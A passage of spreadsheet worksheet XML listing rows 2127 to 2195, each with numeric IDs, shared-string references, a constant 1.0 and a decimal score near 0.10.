        <v>6</v>
      </c>
      <c r="F2127" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="2128" ht="15.75" customHeight="1">
      <c r="A2128" s="1">
        <v>15351.0</v>
      </c>
      <c r="B2128" s="2">
        <v>4.2643409E7</v>
      </c>
      <c r="C2128" s="2" t="s">
        <v>1956</v>
      </c>
      <c r="D2128" s="2">
        <v>1.0</v>
      </c>
      <c r="E2128" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2128" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="2129" ht="15.75" customHeight="1">
      <c r="A2129" s="1">
        <v>19674.0</v>
      </c>
      <c r="B2129" s="2">
        <v>5.6390365E7</v>
      </c>
      <c r="C2129" s="2" t="s">
        <v>1957</v>
      </c>
      <c r="D2129" s="2">
        <v>1.0</v>
      </c>
      <c r="E2129" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2129" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="2130" ht="15.75" customHeight="1">
      <c r="A2130" s="1">
        <v>19820.0</v>
      </c>
      <c r="B2130" s="2">
        <v>5.6961054E7</v>
      </c>
      <c r="C2130" s="2" t="s">
        <v>1958</v>
      </c>
      <c r="D2130" s="2">
        <v>1.0</v>
      </c>
      <c r="E2130" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2130" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="2131" ht="15.75" customHeight="1">
      <c r="A2131" s="1">
        <v>22049.0</v>
      </c>
      <c r="B2131" s="2">
        <v>3.0363034E7</v>
      </c>
      <c r="C2131" s="2" t="s">
        <v>1959</v>
      </c>
      <c r="D2131" s="2">
        <v>1.0</v>
      </c>
      <c r="E2131" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2131" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="2132" ht="15.75" customHeight="1">
      <c r="A2132" s="1">
        <v>22477.0</v>
      </c>
      <c r="B2132" s="2">
        <v>3.6842294E7</v>
      </c>
      <c r="C2132" s="2" t="s">
        <v>1960</v>
      </c>
      <c r="D2132" s="2">
        <v>1.0</v>
      </c>
      <c r="E2132" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2132" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="2133" ht="15.75" customHeight="1">
      <c r="A2133" s="1">
        <v>22745.0</v>
      </c>
      <c r="B2133" s="2">
        <v>4.4241973E7</v>
      </c>
      <c r="C2133" s="2" t="s">
        <v>1961</v>
      </c>
      <c r="D2133" s="2">
        <v>1.0</v>
      </c>
      <c r="E2133" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2133" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="2134" ht="15.75" customHeight="1">
      <c r="A2134" s="1">
        <v>23683.0</v>
      </c>
      <c r="B2134" s="2">
        <v>6982759.0</v>
      </c>
      <c r="C2134" s="2" t="s">
        <v>1962</v>
      </c>
      <c r="D2134" s="2">
        <v>1.0</v>
      </c>
      <c r="E2134" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2134" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="2135" ht="15.75" customHeight="1">
      <c r="A2135" s="1">
        <v>27005.0</v>
      </c>
      <c r="B2135" s="2">
        <v>1.9948284E7</v>
      </c>
      <c r="C2135" s="2" t="s">
        <v>1963</v>
      </c>
      <c r="D2135" s="2">
        <v>1.0</v>
      </c>
      <c r="E2135" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2135" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="2136" ht="15.75" customHeight="1">
      <c r="A2136" s="1">
        <v>27489.0</v>
      </c>
      <c r="B2136" s="2">
        <v>2.2039069E7</v>
      </c>
      <c r="C2136" s="2" t="s">
        <v>1964</v>
      </c>
      <c r="D2136" s="2">
        <v>1.0</v>
      </c>
      <c r="E2136" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2136" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="2137" ht="15.75" customHeight="1">
      <c r="A2137" s="1">
        <v>27583.0</v>
      </c>
      <c r="B2137" s="2">
        <v>2.2529312E7</v>
      </c>
      <c r="C2137" s="2" t="s">
        <v>1965</v>
      </c>
      <c r="D2137" s="2">
        <v>1.0</v>
      </c>
      <c r="E2137" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2137" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="2138" ht="15.75" customHeight="1">
      <c r="A2138" s="1">
        <v>30226.0</v>
      </c>
      <c r="B2138" s="2">
        <v>3.7432788E7</v>
      </c>
      <c r="C2138" s="2" t="s">
        <v>1966</v>
      </c>
      <c r="D2138" s="2">
        <v>1.0</v>
      </c>
      <c r="E2138" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2138" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="2139" ht="15.75" customHeight="1">
      <c r="A2139" s="1">
        <v>21737.0</v>
      </c>
      <c r="B2139" s="2">
        <v>2.5853377E7</v>
      </c>
      <c r="C2139" s="2" t="s">
        <v>1967</v>
      </c>
      <c r="D2139" s="2">
        <v>1.0</v>
      </c>
      <c r="E2139" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2139" s="2">
        <v>0.1044061302681992</v>
      </c>
    </row>
    <row r="2140" ht="15.75" customHeight="1">
      <c r="A2140" s="1">
        <v>26656.0</v>
      </c>
      <c r="B2140" s="2">
        <v>1.8059799E7</v>
      </c>
      <c r="C2140" s="2" t="s">
        <v>1968</v>
      </c>
      <c r="D2140" s="2">
        <v>1.0</v>
      </c>
      <c r="E2140" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2140" s="2">
        <v>0.1044061302681992</v>
      </c>
    </row>
    <row r="2141" ht="15.75" customHeight="1">
      <c r="A2141" s="1">
        <v>24384.0</v>
      </c>
      <c r="B2141" s="2">
        <v>1.0781029E7</v>
      </c>
      <c r="C2141" s="2" t="s">
        <v>1917</v>
      </c>
      <c r="D2141" s="2">
        <v>1.0</v>
      </c>
      <c r="E2141" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2141" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="2142" ht="15.75" customHeight="1">
      <c r="A2142" s="1">
        <v>30493.0</v>
      </c>
      <c r="B2142" s="2">
        <v>3993072.0</v>
      </c>
      <c r="C2142" s="2" t="s">
        <v>1969</v>
      </c>
      <c r="D2142" s="2">
        <v>1.0</v>
      </c>
      <c r="E2142" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2142" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="2143" ht="15.75" customHeight="1">
      <c r="A2143" s="1">
        <v>23952.0</v>
      </c>
      <c r="B2143" s="2">
        <v>8906167.0</v>
      </c>
      <c r="C2143" s="2" t="s">
        <v>1970</v>
      </c>
      <c r="D2143" s="2">
        <v>1.0</v>
      </c>
      <c r="E2143" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2143" s="2">
        <v>0.1041666666666666</v>
      </c>
    </row>
    <row r="2144" ht="15.75" customHeight="1">
      <c r="A2144" s="1">
        <v>24321.0</v>
      </c>
      <c r="B2144" s="2">
        <v>1.0635992E7</v>
      </c>
      <c r="C2144" s="2" t="s">
        <v>1971</v>
      </c>
      <c r="D2144" s="2">
        <v>1.0</v>
      </c>
      <c r="E2144" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2144" s="2">
        <v>0.1041666666666666</v>
      </c>
    </row>
    <row r="2145" ht="15.75" customHeight="1">
      <c r="A2145" s="1">
        <v>7392.0</v>
      </c>
      <c r="B2145" s="2">
        <v>5.1082366E7</v>
      </c>
      <c r="C2145" s="2" t="s">
        <v>1972</v>
      </c>
      <c r="D2145" s="2">
        <v>1.0</v>
      </c>
      <c r="E2145" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2145" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="2146" ht="15.75" customHeight="1">
      <c r="A2146" s="1">
        <v>12208.0</v>
      </c>
      <c r="B2146" s="2">
        <v>2.7580779E7</v>
      </c>
      <c r="C2146" s="2" t="s">
        <v>1973</v>
      </c>
      <c r="D2146" s="2">
        <v>1.0</v>
      </c>
      <c r="E2146" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2146" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="2147" ht="15.75" customHeight="1">
      <c r="A2147" s="1">
        <v>21161.0</v>
      </c>
      <c r="B2147" s="2">
        <v>1.8933572E7</v>
      </c>
      <c r="C2147" s="2" t="s">
        <v>1974</v>
      </c>
      <c r="D2147" s="2">
        <v>1.0</v>
      </c>
      <c r="E2147" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2147" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="2148" ht="15.75" customHeight="1">
      <c r="A2148" s="1">
        <v>26665.0</v>
      </c>
      <c r="B2148" s="2">
        <v>1.8062124E7</v>
      </c>
      <c r="C2148" s="2" t="s">
        <v>1975</v>
      </c>
      <c r="D2148" s="2">
        <v>1.0</v>
      </c>
      <c r="E2148" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2148" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="2149" ht="15.75" customHeight="1">
      <c r="A2149" s="1">
        <v>28343.0</v>
      </c>
      <c r="B2149" s="2">
        <v>2.5923604E7</v>
      </c>
      <c r="C2149" s="2" t="s">
        <v>1976</v>
      </c>
      <c r="D2149" s="2">
        <v>1.0</v>
      </c>
      <c r="E2149" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2149" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="2150" ht="15.75" customHeight="1">
      <c r="A2150" s="1">
        <v>28622.0</v>
      </c>
      <c r="B2150" s="2">
        <v>2.7165628E7</v>
      </c>
      <c r="C2150" s="2" t="s">
        <v>1977</v>
      </c>
      <c r="D2150" s="2">
        <v>1.0</v>
      </c>
      <c r="E2150" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2150" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="2151" ht="15.75" customHeight="1">
      <c r="A2151" s="1">
        <v>10604.0</v>
      </c>
      <c r="B2151" s="2">
        <v>1.3630138E7</v>
      </c>
      <c r="C2151" s="2" t="s">
        <v>1978</v>
      </c>
      <c r="D2151" s="2">
        <v>1.0</v>
      </c>
      <c r="E2151" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2151" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="2152" ht="15.75" customHeight="1">
      <c r="A2152" s="1">
        <v>13107.0</v>
      </c>
      <c r="B2152" s="2">
        <v>3.3533082E7</v>
      </c>
      <c r="C2152" s="2" t="s">
        <v>1979</v>
      </c>
      <c r="D2152" s="2">
        <v>1.0</v>
      </c>
      <c r="E2152" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2152" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="2153" ht="15.75" customHeight="1">
      <c r="A2153" s="1">
        <v>31808.0</v>
      </c>
      <c r="B2153" s="2">
        <v>5.2488179E7</v>
      </c>
      <c r="C2153" s="2" t="s">
        <v>1980</v>
      </c>
      <c r="D2153" s="2">
        <v>1.0</v>
      </c>
      <c r="E2153" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2153" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="2154" ht="15.75" customHeight="1">
      <c r="A2154" s="1">
        <v>8181.0</v>
      </c>
      <c r="B2154" s="2">
        <v>5.3242791E7</v>
      </c>
      <c r="C2154" s="2" t="s">
        <v>1981</v>
      </c>
      <c r="D2154" s="2">
        <v>1.0</v>
      </c>
      <c r="E2154" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2154" s="2">
        <v>0.1029143897996357</v>
      </c>
    </row>
    <row r="2155" ht="15.75" customHeight="1">
      <c r="A2155" s="1">
        <v>28868.0</v>
      </c>
      <c r="B2155" s="2">
        <v>2.9097405E7</v>
      </c>
      <c r="C2155" s="2" t="s">
        <v>1982</v>
      </c>
      <c r="D2155" s="2">
        <v>1.0</v>
      </c>
      <c r="E2155" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2155" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="2156" ht="15.75" customHeight="1">
      <c r="A2156" s="1">
        <v>32125.0</v>
      </c>
      <c r="B2156" s="2">
        <v>5.4113315E7</v>
      </c>
      <c r="C2156" s="2" t="s">
        <v>1983</v>
      </c>
      <c r="D2156" s="2">
        <v>1.0</v>
      </c>
      <c r="E2156" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2156" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="2157" ht="15.75" customHeight="1">
      <c r="A2157" s="1">
        <v>18105.0</v>
      </c>
      <c r="B2157" s="2">
        <v>5.1719672E7</v>
      </c>
      <c r="C2157" s="2" t="s">
        <v>1984</v>
      </c>
      <c r="D2157" s="2">
        <v>1.0</v>
      </c>
      <c r="E2157" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2157" s="2">
        <v>0.1026365348399247</v>
      </c>
    </row>
    <row r="2158" ht="15.75" customHeight="1">
      <c r="A2158" s="1">
        <v>22509.0</v>
      </c>
      <c r="B2158" s="2">
        <v>3.7432789E7</v>
      </c>
      <c r="C2158" s="2" t="s">
        <v>1966</v>
      </c>
      <c r="D2158" s="2">
        <v>1.0</v>
      </c>
      <c r="E2158" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2158" s="2">
        <v>0.1026365348399246</v>
      </c>
    </row>
    <row r="2159" ht="15.75" customHeight="1">
      <c r="A2159" s="1">
        <v>16489.0</v>
      </c>
      <c r="B2159" s="2">
        <v>4.6539674E7</v>
      </c>
      <c r="C2159" s="2" t="s">
        <v>1985</v>
      </c>
      <c r="D2159" s="2">
        <v>1.0</v>
      </c>
      <c r="E2159" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2159" s="2">
        <v>0.1023391812865497</v>
      </c>
    </row>
    <row r="2160" ht="15.75" customHeight="1">
      <c r="A2160" s="1">
        <v>30556.0</v>
      </c>
      <c r="B2160" s="2">
        <v>4.0725986E7</v>
      </c>
      <c r="C2160" s="2" t="s">
        <v>1986</v>
      </c>
      <c r="D2160" s="2">
        <v>1.0</v>
      </c>
      <c r="E2160" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2160" s="2">
        <v>0.1023391812865497</v>
      </c>
    </row>
    <row r="2161" ht="15.75" customHeight="1">
      <c r="A2161" s="1">
        <v>34126.0</v>
      </c>
      <c r="B2161" s="2">
        <v>9768682.0</v>
      </c>
      <c r="C2161" s="2" t="s">
        <v>1987</v>
      </c>
      <c r="D2161" s="2">
        <v>1.0</v>
      </c>
      <c r="E2161" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2161" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="2162" ht="15.75" customHeight="1">
      <c r="A2162" s="1">
        <v>21095.0</v>
      </c>
      <c r="B2162" s="2">
        <v>1.8075694E7</v>
      </c>
      <c r="C2162" s="2" t="s">
        <v>1988</v>
      </c>
      <c r="D2162" s="2">
        <v>1.0</v>
      </c>
      <c r="E2162" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2162" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="2163" ht="15.75" customHeight="1">
      <c r="A2163" s="1">
        <v>32315.0</v>
      </c>
      <c r="B2163" s="2">
        <v>5.5738857E7</v>
      </c>
      <c r="C2163" s="2" t="s">
        <v>1989</v>
      </c>
      <c r="D2163" s="2">
        <v>1.0</v>
      </c>
      <c r="E2163" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2163" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="2164" ht="15.75" customHeight="1">
      <c r="A2164" s="1">
        <v>22940.0</v>
      </c>
      <c r="B2164" s="2">
        <v>4.882956E7</v>
      </c>
      <c r="C2164" s="2" t="s">
        <v>1990</v>
      </c>
      <c r="D2164" s="2">
        <v>1.0</v>
      </c>
      <c r="E2164" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2164" s="2">
        <v>0.1016771488469602</v>
      </c>
    </row>
    <row r="2165" ht="15.75" customHeight="1">
      <c r="A2165" s="1">
        <v>33905.0</v>
      </c>
      <c r="B2165" s="2">
        <v>9217866.0</v>
      </c>
      <c r="C2165" s="2" t="s">
        <v>1991</v>
      </c>
      <c r="D2165" s="2">
        <v>1.0</v>
      </c>
      <c r="E2165" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2165" s="2">
        <v>0.1014957264957265</v>
      </c>
    </row>
    <row r="2166" ht="15.75" customHeight="1">
      <c r="A2166" s="1">
        <v>36.0</v>
      </c>
      <c r="B2166" s="2">
        <v>1.0606854E7</v>
      </c>
      <c r="C2166" s="2" t="s">
        <v>1992</v>
      </c>
      <c r="D2166" s="2">
        <v>1.0</v>
      </c>
      <c r="E2166" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2166" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2167" ht="15.75" customHeight="1">
      <c r="A2167" s="1">
        <v>518.0</v>
      </c>
      <c r="B2167" s="2">
        <v>1822571.0</v>
      </c>
      <c r="C2167" s="2" t="s">
        <v>1993</v>
      </c>
      <c r="D2167" s="2">
        <v>1.0</v>
      </c>
      <c r="E2167" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2167" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2168" ht="15.75" customHeight="1">
      <c r="A2168" s="1">
        <v>1580.0</v>
      </c>
      <c r="B2168" s="2">
        <v>2.7730877E7</v>
      </c>
      <c r="C2168" s="2" t="s">
        <v>1994</v>
      </c>
      <c r="D2168" s="2">
        <v>1.0</v>
      </c>
      <c r="E2168" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2168" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2169" ht="15.75" customHeight="1">
      <c r="A2169" s="1">
        <v>1646.0</v>
      </c>
      <c r="B2169" s="2">
        <v>2.8034877E7</v>
      </c>
      <c r="C2169" s="2" t="s">
        <v>1995</v>
      </c>
      <c r="D2169" s="2">
        <v>1.0</v>
      </c>
      <c r="E2169" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2169" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2170" ht="15.75" customHeight="1">
      <c r="A2170" s="1">
        <v>1744.0</v>
      </c>
      <c r="B2170" s="2">
        <v>2.8818039E7</v>
      </c>
      <c r="C2170" s="2" t="s">
        <v>1996</v>
      </c>
      <c r="D2170" s="2">
        <v>1.0</v>
      </c>
      <c r="E2170" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2170" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2171" ht="15.75" customHeight="1">
      <c r="A2171" s="1">
        <v>1907.0</v>
      </c>
      <c r="B2171" s="2">
        <v>2.999566E7</v>
      </c>
      <c r="C2171" s="2" t="s">
        <v>1997</v>
      </c>
      <c r="D2171" s="2">
        <v>1.0</v>
      </c>
      <c r="E2171" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2171" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2172" ht="15.75" customHeight="1">
      <c r="A2172" s="1">
        <v>2521.0</v>
      </c>
      <c r="B2172" s="2">
        <v>3.4017038E7</v>
      </c>
      <c r="C2172" s="2" t="s">
        <v>1998</v>
      </c>
      <c r="D2172" s="2">
        <v>1.0</v>
      </c>
      <c r="E2172" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2172" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2173" ht="15.75" customHeight="1">
      <c r="A2173" s="1">
        <v>3232.0</v>
      </c>
      <c r="B2173" s="2">
        <v>3.734709E7</v>
      </c>
      <c r="C2173" s="2" t="s">
        <v>1999</v>
      </c>
      <c r="D2173" s="2">
        <v>1.0</v>
      </c>
      <c r="E2173" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2173" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2174" ht="15.75" customHeight="1">
      <c r="A2174" s="1">
        <v>3235.0</v>
      </c>
      <c r="B2174" s="2">
        <v>3.734709E7</v>
      </c>
      <c r="C2174" s="2" t="s">
        <v>2000</v>
      </c>
      <c r="D2174" s="2">
        <v>1.0</v>
      </c>
      <c r="E2174" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2174" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2175" ht="15.75" customHeight="1">
      <c r="A2175" s="1">
        <v>3706.0</v>
      </c>
      <c r="B2175" s="2">
        <v>3.9589636E7</v>
      </c>
      <c r="C2175" s="2" t="s">
        <v>2001</v>
      </c>
      <c r="D2175" s="2">
        <v>1.0</v>
      </c>
      <c r="E2175" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2175" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2176" ht="15.75" customHeight="1">
      <c r="A2176" s="1">
        <v>3932.0</v>
      </c>
      <c r="B2176" s="2">
        <v>4.0579494E7</v>
      </c>
      <c r="C2176" s="2" t="s">
        <v>2002</v>
      </c>
      <c r="D2176" s="2">
        <v>1.0</v>
      </c>
      <c r="E2176" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2176" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2177" ht="15.75" customHeight="1">
      <c r="A2177" s="1">
        <v>4017.0</v>
      </c>
      <c r="B2177" s="2">
        <v>4.094925E7</v>
      </c>
      <c r="C2177" s="2" t="s">
        <v>2003</v>
      </c>
      <c r="D2177" s="2">
        <v>1.0</v>
      </c>
      <c r="E2177" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2177" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2178" ht="15.75" customHeight="1">
      <c r="A2178" s="1">
        <v>4292.0</v>
      </c>
      <c r="B2178" s="2">
        <v>4.1909326E7</v>
      </c>
      <c r="C2178" s="2" t="s">
        <v>2004</v>
      </c>
      <c r="D2178" s="2">
        <v>1.0</v>
      </c>
      <c r="E2178" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2178" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2179" ht="15.75" customHeight="1">
      <c r="A2179" s="1">
        <v>4852.0</v>
      </c>
      <c r="B2179" s="2">
        <v>4.3749452E7</v>
      </c>
      <c r="C2179" s="2" t="s">
        <v>2005</v>
      </c>
      <c r="D2179" s="2">
        <v>1.0</v>
      </c>
      <c r="E2179" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2179" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2180" ht="15.75" customHeight="1">
      <c r="A2180" s="1">
        <v>5108.0</v>
      </c>
      <c r="B2180" s="2">
        <v>4.4534227E7</v>
      </c>
      <c r="C2180" s="2" t="s">
        <v>2006</v>
      </c>
      <c r="D2180" s="2">
        <v>1.0</v>
      </c>
      <c r="E2180" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2180" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2181" ht="15.75" customHeight="1">
      <c r="A2181" s="1">
        <v>5304.0</v>
      </c>
      <c r="B2181" s="2">
        <v>4.5263405E7</v>
      </c>
      <c r="C2181" s="2" t="s">
        <v>2007</v>
      </c>
      <c r="D2181" s="2">
        <v>1.0</v>
      </c>
      <c r="E2181" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2181" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2182" ht="15.75" customHeight="1">
      <c r="A2182" s="1">
        <v>5454.0</v>
      </c>
      <c r="B2182" s="2">
        <v>4.5657531E7</v>
      </c>
      <c r="C2182" s="2" t="s">
        <v>2008</v>
      </c>
      <c r="D2182" s="2">
        <v>1.0</v>
      </c>
      <c r="E2182" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2182" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2183" ht="15.75" customHeight="1">
      <c r="A2183" s="1">
        <v>5788.0</v>
      </c>
      <c r="B2183" s="2">
        <v>4.6753912E7</v>
      </c>
      <c r="C2183" s="2" t="s">
        <v>2009</v>
      </c>
      <c r="D2183" s="2">
        <v>1.0</v>
      </c>
      <c r="E2183" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2183" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2184" ht="15.75" customHeight="1">
      <c r="A2184" s="1">
        <v>5875.0</v>
      </c>
      <c r="B2184" s="2">
        <v>4.7050363E7</v>
      </c>
      <c r="C2184" s="2" t="s">
        <v>2010</v>
      </c>
      <c r="D2184" s="2">
        <v>1.0</v>
      </c>
      <c r="E2184" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2184" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2185" ht="15.75" customHeight="1">
      <c r="A2185" s="1">
        <v>6032.0</v>
      </c>
      <c r="B2185" s="2">
        <v>4.7572498E7</v>
      </c>
      <c r="C2185" s="2" t="s">
        <v>2011</v>
      </c>
      <c r="D2185" s="2">
        <v>1.0</v>
      </c>
      <c r="E2185" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2185" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2186" ht="15.75" customHeight="1">
      <c r="A2186" s="1">
        <v>6153.0</v>
      </c>
      <c r="B2186" s="2">
        <v>4.7856943E7</v>
      </c>
      <c r="C2186" s="2" t="s">
        <v>2012</v>
      </c>
      <c r="D2186" s="2">
        <v>1.0</v>
      </c>
      <c r="E2186" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2186" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2187" ht="15.75" customHeight="1">
      <c r="A2187" s="1">
        <v>6638.0</v>
      </c>
      <c r="B2187" s="2">
        <v>4.9063021E7</v>
      </c>
      <c r="C2187" s="2" t="s">
        <v>2013</v>
      </c>
      <c r="D2187" s="2">
        <v>1.0</v>
      </c>
      <c r="E2187" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2187" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2188" ht="15.75" customHeight="1">
      <c r="A2188" s="1">
        <v>6817.0</v>
      </c>
      <c r="B2188" s="2">
        <v>4.9540298E7</v>
      </c>
      <c r="C2188" s="2" t="s">
        <v>2014</v>
      </c>
      <c r="D2188" s="2">
        <v>1.0</v>
      </c>
      <c r="E2188" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2188" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2189" ht="15.75" customHeight="1">
      <c r="A2189" s="1">
        <v>7165.0</v>
      </c>
      <c r="B2189" s="2">
        <v>5.0496424E7</v>
      </c>
      <c r="C2189" s="2" t="s">
        <v>2015</v>
      </c>
      <c r="D2189" s="2">
        <v>1.0</v>
      </c>
      <c r="E2189" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2189" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2190" ht="15.75" customHeight="1">
      <c r="A2190" s="1">
        <v>7502.0</v>
      </c>
      <c r="B2190" s="2">
        <v>5.1382338E7</v>
      </c>
      <c r="C2190" s="2" t="s">
        <v>2016</v>
      </c>
      <c r="D2190" s="2">
        <v>1.0</v>
      </c>
      <c r="E2190" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2190" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2191" ht="15.75" customHeight="1">
      <c r="A2191" s="1">
        <v>7850.0</v>
      </c>
      <c r="B2191" s="2">
        <v>5.2342641E7</v>
      </c>
      <c r="C2191" s="2" t="s">
        <v>2017</v>
      </c>
      <c r="D2191" s="2">
        <v>1.0</v>
      </c>
      <c r="E2191" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2191" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2192" ht="15.75" customHeight="1">
      <c r="A2192" s="1">
        <v>8056.0</v>
      </c>
      <c r="B2192" s="2">
        <v>5.289876E7</v>
      </c>
      <c r="C2192" s="2" t="s">
        <v>2018</v>
      </c>
      <c r="D2192" s="2">
        <v>1.0</v>
      </c>
      <c r="E2192" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2192" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2193" ht="15.75" customHeight="1">
      <c r="A2193" s="1">
        <v>8214.0</v>
      </c>
      <c r="B2193" s="2">
        <v>5.3310222E7</v>
      </c>
      <c r="C2193" s="2" t="s">
        <v>2019</v>
      </c>
      <c r="D2193" s="2">
        <v>1.0</v>
      </c>
      <c r="E2193" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2193" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2194" ht="15.75" customHeight="1">
      <c r="A2194" s="1">
        <v>8455.0</v>
      </c>
      <c r="B2194" s="2">
        <v>5.3978748E7</v>
      </c>
      <c r="C2194" s="2" t="s">
        <v>2020</v>
      </c>
      <c r="D2194" s="2">
        <v>1.0</v>
      </c>
      <c r="E2194" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2194" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2195" ht="15.75" customHeight="1">
